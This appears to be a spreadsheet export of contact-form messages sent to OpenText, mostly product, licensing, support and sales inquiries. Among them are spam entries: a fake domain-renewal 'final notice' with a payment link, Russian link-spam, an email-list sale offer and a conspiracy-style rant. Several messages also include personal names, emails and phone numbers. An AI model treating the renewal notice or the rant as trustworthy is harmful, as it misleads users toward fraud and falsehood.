_x000D_
As our organization is moving to Windows server 2008, we have to do a minimum (with bare minimum effort and impact)upgrade of the server operation platform. _x000D_
_x000D_
Please can you suggest if we are keeping the SQL 2005 Server, post migrating to window 2008. _x000D_
_x000D_
1. What version of SQL Client should be installed on Content Server?_x000D_
2. Will the Repository and SQL Client be compatible? And what is the minimum SQL Version?_x000D_
_x000D_
Please let us know. _x000D_
_x000D_
Thanks,_x000D_
Lokesh_x000D_
</t>
  </si>
  <si>
    <t>Need assistance with freeing up licenses for employees who are  no longer employed and have left the firm.  Customer ID is FIDL-COV</t>
  </si>
  <si>
    <t xml:space="preserve">We would like a solution for EDI that can work with our SAP.  We are currently using ADX but it is my understanding that we will need to transition to you for Patterson Companies in the near future.  Can someone reach out to me to see if we can begin this transition sooner than later? Thank you! </t>
  </si>
  <si>
    <t>I am the IT manager for our document services department and I am looking for access to create a support ticket for the xPression suite of products.</t>
  </si>
  <si>
    <t>verification of employmnet</t>
  </si>
  <si>
    <t>Set up Account ASAP</t>
  </si>
  <si>
    <t>I am interested in finding out more about a stand-alone license for Teleform to integrate with our faxing and scanning solutions. We are interested in the bubble reading technology and would like a price quote. Thanks</t>
  </si>
  <si>
    <t>Question on whether OpenText has a pre-built "shell" AP Workflow.</t>
  </si>
  <si>
    <t>Hello,_x000D_
My name is Tarny Perkins and I handle the social networking of Corporate Artist and San Francisco artist, Dale Perkins.  Dale has several original watercolors of horses racing at Bay Meadows.  These paintings would be perfect in the right location for companies that are moving into or have moved already into the Bay Meadows area.  Dale lives in Burlingame and has done work in San Mateo before._x000D_
Please consider his artwork if you feel his artwork fits within your corporate profile.  You can reach me at info@sfwatercolors.com and the website is http://www.sanfranciscowatercolors.com._x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello, can you send me technical documentation for the AD Sync capabilities?</t>
  </si>
  <si>
    <t>OpenText,_x000D_
_x000D_
I am getting a case together against the Bilderberg Group; Skull and Crossbones; Central Intelligence Agency (CIA); National Security Agency (NSA); Federal Bureau of Investigation (FBI); Department of Homeland Security; Kellogg, Brown, and Root (KBR); Turner Construction; Skanska; Microsoft; Verizon; Lockheed Martin; Apple; Littler Mendelson; Mount Sinai Health System; Yale and Harvard University; University of Pennsylvania; etc...._x000D_
 _x000D_
My grandfather was at D-Day; and, my father was in the Air Force, and flew people out of Vietnam in the Cambodian Airlift. By the age of 12, I had randomly met Head of the Masons, Queen Elizabeth II; grandson of the Head of the Skull and Crossbones, George W. Bush; and the Dalai Lama._x000D_
 _x000D_
I graduated from the Pennsylvania State University with a Bachelor of Science in Civil Engineering. I went to school there during the Jerry Sandusky Scandal. In 1999, Joe Paterno fired Jerry Sandusky after his first non-guilty verdict; and, the Skull and Crossbones were kicked off of campus. The DA on the 3rd Trial of Jerry Sandusky disappeared; and, his car was found at the bottom of a lake with his hard drive missing from his computer._x000D_
 _x000D_
I started my career at a company called Technip. I worked on the ExxonMobil Billings Refinery (BIRF). The BIRF was built by KBR. KBR is a defense contractor that used to be part of Halliburton. After the recession hit, two thirds of Technip’s Staff was laid off. I worked for WEST Engineering Services after the Deepwater Horizon exploded. They were in charge of third-party verification of Blowout Preventers (BOP) and Hydraulic Control Units. They are the pieces of equipment that failed on the Deepwater Horizon. Shear Rams weren’t tested in compression by Cameron. The Lower Marine Riser Package (LMRP) Disconnect had been fired from the control panel; however, it didn’t work. The Accumulators fired; however, they weren’t able to cut the pipe. The pipe spiraled up in compression, and the Shear Rams on t</t>
  </si>
  <si>
    <t>Interest in a Document Management solution for SAP and other softwares</t>
  </si>
  <si>
    <t>We are a current File 360 customer and would like our account rep @ OpenText to contact us so we can discuss our current and future business relationship.</t>
  </si>
  <si>
    <t>Disclaimer: We are not responsible for any financial loss, data loss, downgrade in search engine rankings, missed customers, undeliverable email or any other damages that you may suffer upon the expiration of www.infogovbasics.com. For more information please refer to section 17.c.1a of our User Agreement. 
 This is your final notice to renew www.infogovbasics.com: 
 https://dnseoco.com/?n=www.infogovbasics.com&amp;r=c 
 In the event that www.infogovbasics.com expires, we reserve the right to offer your listing to competing businesses in the same niche and region after 3 business days on an auction basis. 
 This is the final communication that we are required to send out regarding the expiration of www.infogovbasics.com 
 Secure Online Payment: 
 https://dnseoco.com/?n=www.infogovbasics.com&amp;r=c 
 All services will be automatically restored on www.infogovbasics.com if payment is received in full before expiration. Thank you for your cooperation.</t>
  </si>
  <si>
    <t xml:space="preserve">We use Brava Reader for viewing TIFF files.  Will this be the last version that supports TIFF?_x000D_
</t>
  </si>
  <si>
    <t>Licenses being used</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I cant figure out how to get our copy of the Exceed and Exceed XDK software_x000D_
_x000D_
I logged onto the site, set and confirmed email and passwords, and I get an email that says “Congratulations! You now have access to the Online Support Resources available through My Support.“_x000D_
_x000D_
but when I populate “my products”, I don’t see any, and when I click on tickets / license keys it tells me “We're sorry, your account does not grant you access to this resource. “_x000D_
_x000D_
I am sort of in a bind trying to use the product ASAP this week.._x000D_
_x000D_
Can you tell me how to download our copy of Exceed and Exceed XDK?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Derek Lisoski_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
My name is Damaris, Marketing Assistant from Snarf’s Sandwiches! We are an award-winning sandwich shop in Austin, TX with two convenient locations in the South Congress area (1404 S. 1st St.) and one near the University of Texas (2901 Medical Arts St.). I wanted to introduce myself and reach out to you to see what upcoming events you had planned!_x000D_
_x000D_
We specialize in oven-toasted sandwiches with each sandwich handcrafted to order and served with our own bread recipe that is baked fresh every day. We also have a wide variety of tasty options including fresh salads, daily rotating soups, and desserts. Plus vegetarian options and a complete gluten-free menu! We also offer delivery, catering and online ordering to meet your needs._x000D_
_x000D_
We’d love to connect with you and see how we could benefit you or your organization! From coupons for your employees to catering your next event or lunch, we're here to help and hope to become a “go-to” option for you!_x000D_
_x000D_
_x000D_
-- _x000D_
Best ‘Wiches,_x000D_
_x000D_
Damaris Ramirez_x000D_
_x000D_
Snarf’s Austin Marketing_x000D_
austinmarketing@eatsnarfs.com_x000D_
_x000D_
www.eatsnarfs.com_x000D_
_x000D_
www.instagram.com/snarfssandwichesatx_x000D_
</t>
  </si>
  <si>
    <t>To know about Manual and Automation Testing vacancies available.</t>
  </si>
  <si>
    <t>If I buy Brava Reader for an employee, and that employee leaves, can I reinstall on a different machine with the same license?</t>
  </si>
  <si>
    <t>Interested in document capture solutions for a multi location optometry (eye doctor) clinic.  Specifically we would like to be able to capture various document types (invoices, patient intake forms) and have them classified and data extracted via OCR and exported to a folder structure and/or make database entries in MS SQL database.</t>
  </si>
  <si>
    <t xml:space="preserve">I have not received the invoice to pay for the courses next week. </t>
  </si>
  <si>
    <t>Hello,_x000D_
our customer in Spain has a Documentum implementation on-premise, and they are in the need to integrate an Enterprise Search funcionality that would also integrated with Office365. Could you inform there is a planned roadmap for Search integration with Office 365 (sharepoint online fundamentally). Thanks in advance, for your help. Willia</t>
  </si>
  <si>
    <t>I registered but never recieved my email to complete the registration.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
_x000D_
als einer der größten und erfolgreichsten europäischen Automobil-Groß- und Einzelhändler sind wir laufend bestrebt, unsere IT-Umgebung so effizient wie möglich zu gestalten._x000D_
_x000D_
Der österreichische Porsche-Konzern befindet sich in der Vorbereitung einer Reporting Tool Ausschreibung._x000D_
Ich bitte um Bekanntgabe eines kaufmännischen und fachlichen Ansprechpartners._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested in acquiring Email list of 12,756  Attendees list of ITEXPO East 2018 Attendees List? If yes, acquire this entire list with email address for flat $499. Lists will be delivered in an excel spread sheet. You can send Pre-Show Invitation mailers using these lists or we can help you schedule email campaigns to this list. And also we are ready to provide you some other Email List which your company needs._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I want to sign up at your support site but do not know the answers to some of the items requested, i.e. End User Number, System ID/Serial Number/PIN/VPS. We use the RightFax server product and have a support contract. Thank you._x000D_
</t>
  </si>
  <si>
    <t>Vi håller på med att se över vår nuvarande dokumenthantering och ersätta denna med någon. Vi skulle se positivt om ni kunde dema dokumenthantering på vårt kontor i Stockholm inom de närmsta veckorna. /J</t>
  </si>
  <si>
    <t xml:space="preserve">Captiva Fundamentals and Administration </t>
  </si>
  <si>
    <t>Looking for a facsimile appliance for Avaya SIP or POTS line solution to support of network faxing and support a single telephone number store of multiple appliances for geographical diversity.</t>
  </si>
  <si>
    <t>can not add event to 3367855, can you please check my rights on that? Thanks.</t>
  </si>
  <si>
    <t>I want to have full information of OpenText representative contact person in Saudi Arabia - Riyadh.</t>
  </si>
  <si>
    <t>Interview details</t>
  </si>
  <si>
    <t>OpenText Documentum - compliance information request_x000D_
_x000D_
Dear Sir/Madam,_x000D_
_x000D_
My name is Laimonas, and I work for Fera Science Ltd., a CRO company (Contract Research Organisation) based in York, the UK._x000D_
_x000D_
At the moment we store printed data in our archive, however we are moving towards creating/buying in electronic archive solution in order to meet the MHRA compliance (GLP MA audits)._x000D_
_x000D_
Could you please send us some information on how your software could meet our needs please?_x000D_
_x000D_
At the moment I am shortlisting the potential software providers._x000D_
_x000D_
It would be very greatly appreciated._x000D_
_x000D_
Many thanks and kind regards,_x000D_
Laimonas</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry for:_x000D_
 Software Purchase incl. 1st year maintenance	_x000D_
10 - OpenText Brava Enterprise All-in-One SKU: Doc/Image/CAD with redaction, All Features (per Named User), Version 7.2._x000D_
1 - OpenText Blazon Enterprise - Base Module incl. add-on redaction, Version 7.2_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">1. We currently have Documentum, we would like to inquire if TIM (Total Information Management) is an accredited local provider/reseller?_x000D_
_x000D_
2. We would like to get a price quote for a 150 license of the most recent version of Documentum._x000D_
_x000D_
Thanks. </t>
  </si>
  <si>
    <t>Good morning, I would need the explanation for  the invoice nr 07635941709. We were not successful to contact you by email or tel. Could you please provide me with the description of your sevices charged in return. Till we have not recieved the information from you we cannot proceed the invoice. Thank you for your understanding. Best regards. J. Zidkova</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
Just following up to see if you've had a chance to read my last Email?  I sent you a message a few days ago with some guest post ideas and haven't heard back so I thought I'd follow up._x000D_
_x000D_
I assure you that the content is free and relevant. This will be a well researched, high quality article and not some generic information. _x000D_
_x000D_
If you'd like a guest post on something your readers would enjoy and get value from, just let me know as we'd love to put something together._x000D_
_x000D_
If you have any guidelines then just send them over and we can get started._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cassie_x000D_
_x000D_
Cassie Phillips_x000D_
Marketing Associate_x000D_
DIGITAL EXITS, LLC_x000D_
w:	www.digitalexits.com  e: cassie@digitalexits.com_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am not able to reset the password of my Opentext account (previously created within EMC Support net). I am always getting the error that updating my password caused an error and was not possible._x000D_
Can you please advise on how to get access again?</t>
  </si>
  <si>
    <t>I want to know the prices for support packages for OpenText Content Server. Per ticket, Yearly packages, Monthly Packages or any other existing support packages.</t>
  </si>
  <si>
    <t xml:space="preserve">חברת צמח משה טכנולוגיות 2000 בע"מ מתמחה בייצור סדרות קטנות וגדולות, במתן שירות_x000D_
לעבודות פיתוח בכל תחומי האלקטרוניקה ברמה גבוהה ובזמני אספקה קצרים._x000D_
להלן סוגי העבודות בהן עוסקת החברה:_x000D_
•	הרכבת BGA + צילום רנטגן._x000D_
•	ייצור מעגלי SMT ומעגלי T.H ._x000D_
•	מתן שירות מקצועי ומהיר לעבודות פיתוח (דגמים)._x000D_
•	כל עבודה אחרת הדורשת מקצועיות ואיכות גבוהה._x000D_
•	יש לחברה יכולת ביצועית לעבודות כגון: החלפות F.P ו-BGA מכל הסוגים+תפירות בכמות גדולה בזמן קצר._x000D_
•	ייצור ברמת TURN-KEY ._x000D_
•	החברה  מאושרת  בתקן צבאי IPC_x000D_
</t>
  </si>
  <si>
    <t>When i trying to login in opentext community it showing me that u dont have permission but i already a member of community member,kindly help me out plz _x000D_
i need to login in opentext community in order to see solution by experts_x000D_
this is my email address shahebaz2599@gmail.com</t>
  </si>
  <si>
    <t>StreamServe processes same XML twice (OpenText StreamServe Version 5.6.1 Persuasion)_x000D_
_x000D_
In Control Centre - Log for service "TMv5_POLL"_x000D_
0103 140608 (0506) 0 directoryscanner/1.0: \\10.100.13.30\PRINTXML\HVM\CATCHALL\*.* found:  \\10.100.13.30\PRINTXML\HVM\CATCHALL\02113548_W1600554_00003_PLOSSADV.XML_x000D_
0103 140608 (4290) 0 StrsID completed successfully (StrsID):919367_x000D_
0103 140608 (1155) 0 _____________________________________File copy to to &gt;F:\ManagementGateway\5.6.1\root\applications\TMSV5_HK\Production\in\02113548_W1600554_00003_PLOSSADV.XML_x000D_
0103 140608 (1155) 0 _____________________________________Source back up to &gt;&gt;&gt;&gt;&gt; G:\Data\SourceBackup\PAsia\2018\0103_x000D_
0103 140608 (1155) 0 _____________________________________ Backup Source file to &gt; G:\Data\SourceBackup\PAsia\2018\0103_x000D_
0103 140608 (0569) 1 Job StrsID = '919367' , external ID = '' completed successfully._x000D_
0103 140611 (0506) 0 directoryscanner/1.0: \\10.100.13.30\PRINTXML\HVM\CATCHALL\*.* found:  \\10.100.13.30\PRINTXML\HVM\CATCHALL\02113548_W1600554_00003_PLOSSADV.XML_x000D_
0103 140611 (4290) 0 StrsID completed successfully (StrsID):919368_x000D_
0103 140611 (1155) 0 _____________________________________File copy to to &gt;F:\ManagementGateway\5.6.1\root\applications\TMSV5_HK\Production\in\02113548_W1600554_00003_PLOSSADV.XML_x000D_
0103 140611 (1155) 0 _____________________________________Source back up to &gt;&gt;&gt;&gt;&gt; G:\Data\SourceBackup\PAsia\2018\0103_x000D_
0103 140611 (1155) 0 _____________________________________ Backup Source file to &gt; G:\Data\SourceBackup\PAsia\2018\0103_x000D_
0103 140611 (0569) 1 Job StrsID = '919368' , external ID = '' completed successfully.</t>
  </si>
  <si>
    <t>Так хочется быть кому-то нужной, чувствовать, что хоть одна душа в данный момент думает о тебе. Но вокруг пустота, ты сидишь у окна и серый день съедает тебя изнутри, подробнее об этом читайте на сайте [url=http://ladysarafan.ru]ladysarafan.ru[/url]</t>
  </si>
  <si>
    <t>To Improve The future of AI and Analytics</t>
  </si>
  <si>
    <t>We are reseller in Mexico._x000D_
My client wants one of your products "Brava Reader pro", who can we buy it, Is there a distribuitor here in mexico?_x000D_
regards!!</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to understand the licensing costs for Redact-it to use in SharePoint online with roughly 5000 users.  </t>
  </si>
  <si>
    <t>need a formal invitation for processing my visa application at Australian Embassy in Pakistan</t>
  </si>
  <si>
    <t>Past due invoices: I am no longer receiving copies of my invoices and when I am on the website you don't provide me an option to print and then my AP person gets threats that you are going to close my account.  Not very professional in my opinion, I need to have copies of my invoices either mailed or emailed!</t>
  </si>
  <si>
    <t>I cannot reset my password in order to view forum for ApplicationXtender</t>
  </si>
  <si>
    <t>phase out existing copper fax lines/machines located at several branches and replace with cloud solution</t>
  </si>
  <si>
    <t xml:space="preserve">Need to speak with a Sales rep regarding product for a customer and rough order of magnitude cost. Soon if possible. </t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
I’m reaching out on behalf of Cognizant Technology Solutions.  We are representing a client who is looking to decommission a legacy system and will be employing a new vendor for its mortgage servicing platform.  In preparation to send an RFI followed by an RFP on behalf of our client, we are reaching out to vendors to provide us with a contact that we can correspond with going forward.  The contact will need to be available over the next 4 to 6 weeks and be privy to your offerings.  Within the RFI / RFP, we will partner with our client to ask basic questions that we will use to provide our client with more clarity on which vendor it should move forward with given our client’s go forward strategy.  That being said, can you or someone from your team provide us with a contact that we can work closely with during our identification stage?    _x000D_
Thank you,_x000D_
Cody Brightbill_x000D_
</t>
  </si>
  <si>
    <t>Contract: 1040 1858 8657_x000D_
_x000D_
Please add me to this group so I can use OpenText support.</t>
  </si>
  <si>
    <t>We have a client that is running an older version of Application Xtender (version 6.5) and they are not happy with it. They have an archive of scanned PDF files that they access from time to time. They expressed an interest in getting rid of the solution altogether, but I want to explore what can be done to improve what we have firstly. I have asked for more detail on the serial numbers or unique identifiers so that we have better detail. I would like to discuss the options from your viewpoint..</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to get renewal pricing for the below:_x000D_
Application Governance &amp; Archiving add-on bundle for Sharepoint  (CLM version)_x000D_
OpenText Annual Maintenance Doc Management Application_x000D_
Vendor Invoice Management Solution for SAP  qty: 750000_x000D_
</t>
  </si>
  <si>
    <t>Good Afternoon, _x000D_
_x000D_
My name is Ivan Ortiz, Head of Marketing over at ComplianceX.  _x000D_
_x000D_
We noticed that your company offers Compliance related services to professionals and thought that our advertising services would benefit you to reach the right targeted audience for what your company has to offer to our subscriber base. _x000D_
_x000D_
Our website, ComplianceX is the #1 News Blog covering everything happening in the world of Compliance today. Included are daily articles covering career advice and news from across the Compliance world and advertisers showcasing their conference/services with display ads prominently displayed across our website. The average visitor to the site are Compliance, Legal, RegTech, FinTech, Blockchain, Regulatory or Risk Audit professionals interested in the latest up-to-date news that will help in their careers. _x000D_
_x000D_
With a daily newsletter that reaches over 100,000 subscribers every day, over 100,000 unique views a month on our ComplianceX news blog and a strong LinkedIn presence with over 165,000 members, you’ll be sure to deliver your message to the right audience. _x000D_
_x000D_
Take a look at our latest landing page to learn more about what CSG can do for you. _x000D_
_x000D_
ComplianceX URL Link - http://bit.ly/2BDUA5f _x000D_
_x000D_
Give me a call at (212) 997-3166 or email me at iortiz@compliancesearch.com to advertise your upcoming conference or services with ComplianceX. _x000D_
_x000D_
Thank you. _x000D_
_x000D_
Best regards, _x000D_
_x000D_
_x000D_
Ivan Ortiz_x000D_
Head of Marketing_x000D_
ComplianceX_x000D_
Phone: (212) 997-3166_x000D_
Email: iortiz@compliancesearch.com_x000D_
YouTube: Compliance Search Group Channel_x000D_
Website: www.complianceX.com</t>
  </si>
  <si>
    <t>We want to upgrade our OpenText Process Suite software, and received information that OTDS is required for Process Suite 16.3. OTDS is new for our department. Involving this I have the following questions:_x000D_
_x000D_
1. For the training "3-0300 OpenText Directory Services (OTDS) Integration and Configuration v16" it states that training "3-0188 OpenText Content Server System Administrator" is a pre-requisite. We don't use Content Server at our organization and would like to verify if this is really required._x000D_
_x000D_
2. Since we use Process Suite, is it possible to see OTDS working in combination with Process Suite in the course? We want to make sure the training is enough to get OTDS working in combination with Process Suite (again, examples in combination with Content Server aren't really usefull for us, since we don't use it)._x000D_
_x000D_
2. We have 3 colleagues who would like to take this course. Is there a possibility to follow the course at location OpenText Netherlands in Putten?_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Michiel Hubers</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to use the first class go app for android. It is absolutely impossible to use. Won't allow you to sign in 9 times out of 10 and when it does it it won't load things. Is there a different app I should be using or another way to access the site while out and about? Is the updates being worked on for the app? </t>
  </si>
  <si>
    <t xml:space="preserve">looking for an x server solution to transition from use of eXcursion control system software used to interface with openvms servers related to the SCADA controls system operator interface HMI. </t>
  </si>
  <si>
    <t xml:space="preserve">Hoping to get a late registration in the Opentext VIM virtual class that starts next week ...Teri </t>
  </si>
  <si>
    <t>Try to buy my own Developer license.</t>
  </si>
  <si>
    <t xml:space="preserve">Support Ticket : 3379784   _x000D_
Priority 1 License Key needed for 20 seats of Brava Desktop to fix License Manager problems. Contact: garymagoon@att.net    </t>
  </si>
  <si>
    <t>Good Morning – We would like to setup a date/time for someone from your organization to do a brief demo of your creative approval software. Please let me know if you have a brief moment to connect, or if there are some date/times that we can put on the calendar for this week or next.</t>
  </si>
  <si>
    <t>Would like information on Alchemy-please send brochure - do not call._x000D_
15133 S. Route 59_x000D_
Plainfield, IL  60544</t>
  </si>
  <si>
    <t>hello, we work with Nordstrom and need to set up EDI with our warehouse Bergen Logistics. They said we need a UPC catalogue and that we should contact you._x000D_
Please advise._x000D_
Many thanks, Hanna</t>
  </si>
  <si>
    <t>Hi there_x000D_
Would it be possible to have a free trial to use the OpenText Business Intelligence system.</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
We, as company, are looking for a knowledge base. We think Documentum D2 is a good solution for us. I have two questions about that:_x000D_
- Do I need OpenText Core to be able to use Documentum? Or can I use documentum as a sole standing software program?_x000D_
- What is the price of a documentum license? I can 't find the price anywhere._x000D_
- How much time does it cost me to implement Documentum in the company?_x000D_
_x000D_
Greatings,_x000D_
Bram</t>
  </si>
  <si>
    <t>Simone Harding sent me email with some instructions how to Access Opentext connect. I am not able to find / send new general ticket. I would like to get Access to partner portal and learning central. I am working for Fujitsu Finland Oy. Fujitsu Finland Oy, is an OpenText Partner with valid partner contract. My user ID is lasse.ahokas@fi.fujitsu.com. Reason to Access is to find sales certificate e-learning course. Thank you beforehand. Regards Lasse Ahokas</t>
  </si>
  <si>
    <t>I have recently left a company that used BRAVA for take off work in the QS Dept of a construction company and am keen to promote it within the current organisation. Looking to get some details, costs etc for a presentation to others.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are the technical support of an eDocs application at the Dutch ministry of economic affairs.  As new people were joining our team, we are interested in onsite eDocs DM 10 training, both function but also technical. Are you offering any such courses? _x000D_
Kind regards,_x000D_
Judith</t>
  </si>
  <si>
    <t>Working as a documentum consultant need access to participate in community portal</t>
  </si>
  <si>
    <t>I am looking after the RFID activation on StreamServe - how to get that ?_x000D_
We have our streamServe via Infor M3 setup and would like to be able to print RFID tags on a Zebra printer_x000D_
what to do ?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich bin auf der Suche nach General Avbailability / End of Support / End of Life Daten für OpenText Software-Produkte, konnte zu diesem Thema aber nichts auf Ihrer Webseite finden. Können Sie mich hierzu unterstützen?_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Tim Frölich</t>
  </si>
  <si>
    <t>We are the Ricoh distributor in Romania and look for a solution that can integrate fax and printing. We understood that Right Fax has a connection with Equitrac. We would like to know more.  The project that we look for has 240 faxes on mfps . How can we didgitise the process? Does the solution integrates with Microspft Exchange ? What would be the cost ?</t>
  </si>
  <si>
    <t>Hello. Since I don' t work anymore with Opentext I would like to cancel my account. I can' t do it myselve because the password is not accepted by the site and if I try to reset the password through your link when I type the new password the system goes in error.</t>
  </si>
  <si>
    <t>Hello, Can you provide me with the Correction Manual for VIMI-12239 (Article ID: KB476878), as we have this problem._x000D_
With best regards _x000D_
Norbert Rose</t>
  </si>
  <si>
    <t>We are responding to one of our client's RFP related to Office 365 SharePoint (SharePoint Online). One of the requirements was to search OpenText repository from SharePoint and surface the results with links to documents in OpenText.  Client's OpenText version is Content Server 10.5 SP1. Are you able to advise me the best integration approach we could propose to them for this functionality?_x000D_
_x000D_
Thanks,_x000D_
-Dinesh</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day _x000D_
_x000D_
kindly email me , we need to find better price than what we get from your local vendor in Saudi Arabia , who increased the prices and company looking for either better offer or we will look for another alternative applications to fulfill our users needs _x000D_
_x000D_
please come back to me ASAP _x000D_
_x000D_
Thank you _x000D_
_x000D_
Fahad_x000D_
_x000D_
PS: you can call me between 08:00 - 10:00 / 13:00 - 14:00 (GMT+3)  phone # +966138804777_x000D_
_x000D_
	 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day _x000D_
_x000D_
kindly email me , we need to find better price than what we get from your local vendor in Saudi Arabia , who increased the prices and company looking for either better offer or we will look for another alternative applications to fulfill our users needs _x000D_
_x000D_
please come back to me ASAP _x000D_
_x000D_
Thank you _x000D_
_x000D_
Fahad_x000D_
_x000D_
PS: you can call me any time between 08:00 - 10:00 / 13:00 - 14:00 (GMT+3) on +96613880477 </t>
  </si>
  <si>
    <t>Косметические средства, предлагаемые в торговых точках, различаются по разным показателям, подробнее читайте на сайте [url=http://womanmaniya.ru]womanmaniya.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I am in accounts receivable and need access to remittance advices for chargebacks. </t>
  </si>
  <si>
    <t>I am unable to log into the RightFax connect site, https://connect.rightfax.com. Can you reset my password. I do not see a "Forgot My Password" link.</t>
  </si>
  <si>
    <t>Dear Madam or Sir,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I hope your day is going well!    I have been in the legal industry for over 20 years.  I have been very successful selling to large law firms and corporate accounts. I am currently working with large law in NYC.  I have legal contacts all over the US._x000D_
_x000D_
I have worked for a computer forensic company and had been very successful.  Unfortunately there were commission issue that forced me to leave.  Would love to speak to someone in your organizations about my qualifications. _x000D_
_x000D_
Best regards,_x000D_
_x000D_
Bill</t>
  </si>
  <si>
    <t>Good afternoon!_x000D_
_x000D_
BLG is using eDocs DM as its file management and my lawyer would like to purchase and install eDocs DM on her laptop for her personal use. Is this possible? If it is, please advise how much this program costs and how it can be purchased (by email). Thank you!_x000D_
_x000D_
Best regards,_x000D_
Paulina</t>
  </si>
  <si>
    <t>To whom it may concern, _x000D_
My name is Yazan Hattoum, I am currently employed at the Representative Office of Canada to the Palestinian Authority as Coordinator for the Canadian Fund for Local Initiatives, along with our partners PalTrade and the Canadian Arab Chamber of Commerce we are planning a trade mission for a number of Palestinian business owners and entrepreneurs to travel to Canada on the 28th of January as an initiative to increase and strengthen trade relations between the two countries, two business in the Palestinian (ProGineer and ZevaInc) Hi-Tech scene have showed interest in meeting with Canadian companies from the ICT sector, your company came as a targeted business for the both businesses and I would appreciate it if you can let me know in case you are interested in joining the meetings scheduled in Toronto and Ottawa (I can provide specific dates, location and companies profiles in my next email) or if you prefer schedule a meeting  at your offices. _x000D_
Looking forward to hear from you at your earliest convenience. _x000D_
_x000D_
Sincerely, _x000D_
Yazan.</t>
  </si>
  <si>
    <t>Need discussion for supporting a product known as "DocsOpen" originally sold to Genzyme Genetics which was acquired by LabCorp.</t>
  </si>
  <si>
    <t>how do I download the program?</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please advise what are the current fees for Toys R Us gateway? Annually and monthly and per transaction? </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know more about open text and would like to see if that fits our requirements. If so we would like to present it to business.Thank you. _x000D_
_x000D_
NaGa._x000D_
</t>
  </si>
  <si>
    <t>I need help access our old IGC Account. We purchased Brava Desktop year ago and don't have access to it.</t>
  </si>
  <si>
    <t>I am trying to run a report that shows the monthly premium payments.  How do I do that?</t>
  </si>
  <si>
    <t>New business. Reconnect after my previous contact at OpenText left.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I need to verify the details on your invoices UKSl1622 and 6047, in order to set your organisation up as a supplier._x000D_
Would you please send me your company number and confirm whether or not the following is your business address:_x000D_
Registered office address_x000D_
420 Thames Valley Park Drive, Thames Valley Park, Reading, England, RG6 1PT _x000D_
Thank you for your assistance._x000D_
Kind regards_x000D_
Jo_x000D_
</t>
  </si>
  <si>
    <t>We are looking for a supplier portal that integrates with our ERP, Workday. Specifically, we are looking for a secure, web-based site where new suppliers can login and input their contact information, tax information, banking info, etc., can upload invoices and can maintain any changes in their information. From your website, I can't tell if this is something you offer. Thanks.</t>
  </si>
  <si>
    <t>Dear Mr/Mrs,_x000D_
_x000D_
I am Dogukan, Senior SW Engineer from ING Bank Turkey. I am part of Document Management Team._x000D_
_x000D_
We have a project, including advanced OCR operations and AI to detect and to classify and also to extraction from documents. _x000D_
_x000D_
We require a tool that takes the document and returns the full text as a compatible input for AI. _x000D_
_x000D_
Firstly, We would like know that do you have any official partner from Turkey? If yes, please redirect them to us._x000D_
_x000D_
We would like to hear your solutions._x000D_
_x000D_
Please answer me in positive / negative way._x000D_
Kind Regars,_x000D_
DG.</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to get a download link for your product ( Brava reader ) Please Email the link to download the product. Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,  _x000D_
 _x000D_
My name is Nicole Beahan and I’m working in the Technology Procurement team at Oxford University Press. _x000D_
_x000D_
I am currently working through some compliance checks and I was wondering if you could send me the Oxford University Press Account Manager’s contact details so I can get in touch with the correct person to assist me with my query._x000D_
_x000D_
I look forward to your response. _x000D_
 _x000D_
Kind Regards,_x000D_
_x000D_
Nicole Beahan_x000D_
Contract Analyst – Technology Procurement_x000D_
_x000D_
 _x000D_
_x000D_
E: Nicole.Beahan@oup.com _x000D_
Great Clarendon Street Oxford OX2 6DP United Kingdom_x000D_
</t>
  </si>
  <si>
    <t>I had an access below migrted opentext/documentum community link._x000D_
https://communities.opentext.com_x000D_
but since last 2 days Im not able to access due to Permission Problem. _x000D_
 Please help.</t>
  </si>
  <si>
    <t>I used to deal with Jason Ing (an account manager at OpenText) but notice that his email now doesnt work.  Is there someone else I can deal with regarding renewals for a client of mine?</t>
  </si>
  <si>
    <t xml:space="preserve">We need an installed for win10/Office 2016 and was wondering where we can find this installer. Our current installer does not work for office 2016. </t>
  </si>
  <si>
    <t>I can't access to my support account. i have a big problem on my application OPENTEXT DOCUENTUM. I need your help please</t>
  </si>
  <si>
    <t>Just install the latest version of the free reader.  When i open file it still says i need to update to the latest version in four days.</t>
  </si>
  <si>
    <t>Приветствую всех! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [url=http://kinorulez.ru/]Лучшие комедии 2017 список[/url] _x000D_
Тут: http://kinorulez.ru/news/7864-v-kieve-proydet-yubileynyy-festival-korotkometrazhek-new-vision.html [b] В Киеве пройдет юбилейный фестиваль короткометражек New Vision [/b] _x000D_
